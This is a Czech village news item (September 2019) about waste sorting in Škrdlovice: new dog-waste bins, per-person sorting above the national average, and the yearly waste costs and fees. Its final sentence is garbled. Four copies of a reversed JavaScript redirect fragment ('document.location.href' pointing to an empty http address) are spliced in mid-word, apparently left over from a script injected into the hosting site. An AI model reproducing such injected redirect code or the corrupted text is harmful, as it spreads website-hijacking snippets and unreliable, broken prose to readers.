Rainbow page separator

Ve Škrdlovicích lidé třídí odpady nad republikovým průměrem

Pondělí, 23. září 2019

Škrdlovice / Odpadkové koše na psí exkrementy už nějakou dobu slouží pejskařům ve Škrdlovicích. Zatím jsou tři, ale pokud se osvědčí, obec jejich počet zvýší. V loňském roce lidé ve vesnici navíc vytřídili v průměru 71,8 kilogramu odpadů na osobu, což je podstatně více než celorepublikový průměr, který činí 49 kilogramů na obyvatele.
Náklady na sběr a svoz všech odpadů ve Škrdlovicích, tedy komunálních, nebezpečných, tříděných i bioodpadů, se v loňském roce vyšplhaly na 776 540 korun.
Příjmy na jejich likvidaci byly vybrány ve výši 653 194 korun – šlo o poplatky za svoz komunálního odpadu od obyvatel ve výši 412 350 korun, příjmy za svoz odpadu od podnikatelských subjektů za 90 710 korun a příspěvek z Eko-komu za třídění odpadů do barevných kontejnerů ve výši 150 134 korun. Obec tak na svoz a likvidaci odpadu loni doplácela celkem 123 346 korun. Vzhledem ke zvýšení cen svozové společnosti se nicméně dá předpokládat, že za le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní rok bude ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to částka o něco vyšší.